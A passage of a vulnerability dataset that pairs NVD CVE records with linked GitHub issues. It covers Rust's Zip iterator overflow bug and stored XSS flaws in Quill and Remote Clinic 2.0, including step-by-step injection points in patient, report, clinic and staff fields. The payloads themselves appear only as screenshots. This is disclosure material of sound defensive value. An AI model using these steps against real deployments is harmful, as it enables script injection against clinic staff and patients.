null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/rust-lang/rust/issues/82291
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
Here `__iterator_get_unchecked` is called for potential side effects until `self.index == self.a.size()`, ignoring however that it could have already been called in `next_back` with those indexes. https://github.com/rust-lang/rust/blob/0148b971c921a0831fbf3357e5936eec724e3566/library/core/src/iter/adapters/zip.rs#L200-L208 [Playground link](https://play.rust-lang.org/?version=nightly&mode=release&edition=2018&gist=196385a61f316746f71e9a59aa68d6e7) that demonstrates how this can be exploited to get two mutable references to the same data and cause an use-after-free bug.
Zip may call __iterator_get_unchecked twice with the same index
https://api.github.com/repos/rust-lang/rust/issues/82291/comments
6
2021-02-19T14:23:14Z
2021-03-07T05:50:02Z
https://github.com/rust-lang/rust/issues/82291
812,063,911
82,291
1,819
CVE-2021-28879
2021-04-11T20:15:12.877
In the standard library in Rust before 1.52.0, the Zip implementation can report an incorrect size due to an integer overflow. This bug can lead to a buffer overflow when a consumed Zip iterator is used again.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/82282" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/82289" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/issues/82282" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/rust-lang/rust/pull/82289" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CZ337CM4GFJLRDFVQCGC7J25V65JXOG5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TFUO3URYCO73D2Q4WYJBWAMJWGGVXQO4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VZG65GUW6Z2CYOQHF7T3TB5CZKIX6ZJE/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202210-09" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:rust-lang:rust:*:*:*:*:*:*:*:*", "matchCriteriaId": "8E9A2A10-536D-4719-9D35-637A525E1E04", "versionEndExcluding": "1.52.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/rust-lang/rust/issues/82282
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rust-lang", "rust" ]
https://github.com/rust-lang/rust/blob/0148b971c921a0831fbf3357e5936eec724e3566/library/core/src/iter/adapters/zip.rs#L200-L208 https://github.com/rust-lang/rust/blob/0148b971c921a0831fbf3357e5936eec724e3566/library/core/src/iter/adapters/zip.rs#L214-L218 `self.index` can be set to a value greater than `self.len` in this branch. This causes integer overflow in `size_hint()` and lead to a buffer overflow. [Playground Link](https://play.rust-lang.org/?version=stable&mode=release&edition=2018&gist=0e6f0c70e6aaaba62610f19fd9186756) that demonstrates segfault with safe Rust code.
Side effect handling in specialized zip implementation causes buffer overflow
https://api.github.com/repos/rust-lang/rust/issues/82282/comments
2
2021-02-19T03:43:41Z
2021-03-05T16:31:26Z
https://github.com/rust-lang/rust/issues/82282
811,657,590
82,282
1,820
CVE-2021-3163
2021-04-12T21:15:14.340
A vulnerability in the HTML editor of Slab Quill 4.8.0 allows an attacker to execute arbitrary JavaScript by storing an XSS payload (a crafted onloadstart attribute of an IMG element) in a text field. Note: Researchers have claimed that this issue is not within the product itself, but is intended behavior in a web browser
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://burninatorsec.blogspot.com/2021/04/cve-2021-3163-xss-slab-quill-js.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/quilljs/quill/issues/3273" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/quilljs/quill/issues/3364" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://quilljs.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://burninatorsec.blogspot.com/2021/04/cve-2021-3163-xss-slab-quill-js.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/quilljs/quill/issues/3273" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/quilljs/quill/issues/3364" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://quilljs.com" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:slab:quill:4.8.0:*:*:*:*:node.js:*:*", "matchCriteriaId": "AE851EDE-63BD-4A7A-9A1E-7AE5575DDEB0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/quilljs/quill/issues/3364
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "quilljs", "quill" ]
Hi. I would like to raise a security issue which is described in CVE-2021-3163. Is there any fix for that or do someone know an ETA when that security issue will be fixed? Thanks in advance.
Security Issue CVE-2021-3163
https://api.github.com/repos/slab/quill/issues/3364/comments
93
2021-05-11T14:34:05Z
2024-08-12T06:40:58Z
https://github.com/slab/quill/issues/3364
887,475,238
3,364
1,821
CVE-2021-30030
2021-04-13T00:15:12.373
Cross Site Scripting (XSS) in Remote Clinic v2.0 via the Full Name field on register-patient.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162291/RemoteClinic-2.0-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162291/RemoteClinic-2.0-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/remoteclinic/RemoteClinic/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
Stored XSS vulnerability in Version 2.0 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page (patients). Vulnerable Endpoint: https://localhost/RemoteClinic/patients Step To Reproduce: 1) Login to Application as a Doctor. 2) Now got to "New Patient". ![1_edited](https://user-images.githubusercontent.com/81484562/112753676-05608000-8ff2-11eb-998e-bf5c77b70f16.jpg) 3) Register a Patient Name with below XSS Payload: ![Capture1](https://user-images.githubusercontent.com/81484562/112754014-a996f680-8ff3-11eb-8447-c2281a7ff6d5.JPG) ![2](https://user-images.githubusercontent.com/81484562/112753722-40fb4a00-8ff2-11eb-9221-5c474db39434.JPG) 4) After Register Patient, go to "Patients". ![edit1](https://user-images.githubusercontent.com/81484562/112754187-67ba8000-8ff4-11eb-8d1f-bd0c6e91a33d.jpg) 5) XSS Executed. ![3edit](https://user-images.githubusercontent.com/81484562/112754714-c680f900-8ff6-11eb-9c92-c267e4b36d8a.jpg)
Cross Site Scripting (Stored XSS) vulnerability in /patients
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/1/comments
2
2021-03-28T13:53:58Z
2021-04-22T09:33:20Z
https://github.com/remoteclinic/RemoteClinic/issues/1
842,743,265
1
1,822
CVE-2021-30034
2021-04-13T00:15:12.453
Cross Site Scripting (XSS) in Remote Clinic v2.0 via the Symptons field on patients/register-report.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162291/RemoteClinic-2.0-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/5" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162291/RemoteClinic-2.0-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/5" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/remoteclinic/RemoteClinic/issues/5
[ "Exploit", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
Stored XSS vulnerability in Version 2.0 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: http://localhost/RemoteClinic/dashboard/ Step To Reproduce: 1) Login in Application as a doctor. 2) Register a patient. ![1_edited](https://user-images.githubusercontent.com/81484562/112853669-8721dd80-90c6-11eb-9b6b-a2a77e58c07a.jpg) ![issue1](https://user-images.githubusercontent.com/81484562/112853822-afa9d780-90c6-11eb-89d5-554683bc1c9a.JPG) 3) After Register a Patient, a page redirect you to "register report page". ![issue1_1](https://user-images.githubusercontent.com/81484562/112854038-e1bb3980-90c6-11eb-911d-c6636f9d9eb6.JPG) 4) Here is "Symptoms" field where i inject XSS payload. ![Capture1](https://user-images.githubusercontent.com/81484562/112854397-3e1e5900-90c7-11eb-8c01-3e5685e57cee.JPG) ![issue1_2](https://user-images.githubusercontent.com/81484562/112854513-5db58180-90c7-11eb-945c-06c72eab1d23.JPG) 5) After Register Report, Click on home. ![issue1_3](https://user-images.githubusercontent.com/81484562/112854718-8dfd2000-90c7-11eb-8208-291bfb8c758b.JPG) 6) XSS Executed on Dashboard Endpoint. ![issue1_4](https://user-images.githubusercontent.com/81484562/112854786-9ce3d280-90c7-11eb-8c3d-12e59690aafa.JPG)
Stored XSS vulnerability in /dashboard
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/5/comments
2
2021-03-29T14:48:24Z
2021-04-22T09:33:49Z
https://github.com/remoteclinic/RemoteClinic/issues/5
843,447,821
5
1,823
CVE-2021-30039
2021-04-13T00:15:12.513
Cross Site Scripting (XSS) in Remote Clinic v2.0 via the "Fever" or "Blood Pressure" field on the patients/register-report.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162291/RemoteClinic-2.0-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162291/RemoteClinic-2.0-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/8" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/remoteclinic/RemoteClinic/issues/8
[ "Exploit", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
Stored XSS vulnerability in Version 2.0 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: http://localhost/RemoteClinic/patients/reports.php?id=85 (In my case, 85 is My Patient Report ID). Steps to Reproduce: 1) Login in Application as Doctor. 2) Register New Patient. ![1_edited](https://user-images.githubusercontent.com/81484562/113138139-d559ec80-923e-11eb-8e71-6f1642c32749.jpg) ![issue4_1](https://user-images.githubusercontent.com/81484562/113138185-e3a80880-923e-11eb-9dc1-66d521659c71.JPG) 3) After Register New Patient, a page redirect to Register Report Page, when you scroll down page two fields there "Fever" and "Blood Pressure" where i inject XSS Payload: ![Capture1](https://user-images.githubusercontent.com/81484562/113138574-67fa8b80-923f-11eb-9448-1ec56f80a546.JPG) ![issue4_2](https://user-images.githubusercontent.com/81484562/113138282-0803e500-923f-11eb-9814-3d5a196c55a6.JPG) 4) Now go to home page. ![issue4_3](https://user-images.githubusercontent.com/81484562/113138818-bad44300-923f-11eb-8c60-b302afd0e8e3.JPG) 5) Click on Report which shows on dashboard "Fever...". ![issue5_1](https://user-images.githubusercontent.com/81484562/113139122-1ef70700-9240-11eb-843c-92b75e0b2d74.JPG) 6) XSS Executed on reports.php endpoint. ![issue5_2](https://user-images.githubusercontent.com/81484562/113139212-4352e380-9240-11eb-8c45-b221687656fc.JPG)
Stored XSS vulnerability in /patients/reports.php?id={Report ID}
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/8/comments
2
2021-03-31T11:45:59Z
2021-04-22T09:34:03Z
https://github.com/remoteclinic/RemoteClinic/issues/8
846,500,750
8
1,824
CVE-2021-30042
2021-04-13T00:15:12.577
Cross Site Scripting (XSS) in Remote Clinic v2.0 via the "Clinic Name", "Clinic Address", "Clinic City", or "Clinic Contact" field on clinics/register.php
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162291/RemoteClinic-2.0-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162291/RemoteClinic-2.0-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/remoteclinic/RemoteClinic/issues/11
[ "Exploit", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
Stored XSS vulnerability in Version 2.0 which allows remote attacker to inject arbitrary script or html. This being stored, will impact all users who have permissions to view the vulnerable page. Vulnerable Endpoint: http://localhost/RemoteClinic/clinics/profile.php?id=32 (in my case, 32 is Clinic ID). Step To Reproduce: 1) Login in Application as Doctor. 2) When you scroll down the main dashboard page, there is clinics options, Click "New Clinic". ![1](https://user-images.githubusercontent.com/81484562/113184289-6e542c00-926e-11eb-8542-8251bde3df36.JPG) 3) Here is four fields vulnerable for XSS /clinics/profile.php?id={Clinic ID} endpoint, "Clinic Name", "Clinic Address", "Clinic City" and "Clinic Contact", Inject XSS Payload in "Clinic Name", "Clinic Address", "Clinic City" and "Clinic Contact". ![Capture1](https://user-images.githubusercontent.com/81484562/113184992-4fa26500-926f-11eb-89d9-19ca6af405c4.JPG) ![issue2](https://user-images.githubusercontent.com/81484562/113184608-d60a7700-926e-11eb-9aa5-e9a19e25d1c7.JPG) 4) Click on "Register". 5) Now Click on "Clinics Directory". ![issue22](https://user-images.githubusercontent.com/81484562/113185124-7cef1300-926f-11eb-9a91-56336c4c3648.JPG) 6) After click on "Clinics Directory", you direct to /clinics/ endpoint where clinics directory show. Click on Clinic where XSS name show. ![issue2_1](https://user-images.githubusercontent.com/81484562/113185766-4bc31280-9270-11eb-886c-0b9802accc21.JPG) 7) XSS Executed on /clinics/profile.php?id={Clinic ID} endpoint. ![issue2_22](https://user-images.githubusercontent.com/81484562/113185418-df481380-926f-11eb-9a6d-1f94f536faa1.JPG)
Stored XSS vulnerability in /clinics/profile.php?id={Clinic ID}
https://api.github.com/repos/remoteclinic/RemoteClinic/issues/11/comments
2
2021-03-31T17:31:59Z
2021-04-22T09:34:18Z
https://github.com/remoteclinic/RemoteClinic/issues/11
847,014,599
11
1,825
CVE-2021-30044
2021-04-13T00:15:12.640
Cross Site Scripting (XSS) in Remote Clinic v2.0 via the First Name or Last Name field on staff/register.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162262/RemoteClinic-2-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/162262/RemoteClinic-2-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/remoteclinic/RemoteClinic/issues/13" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/remoteclinic/RemoteClinic/issues/13
[ "Exploit", "Third Party Advisory" ]
github.com
[ "remoteclinic", "RemoteClinic" ]
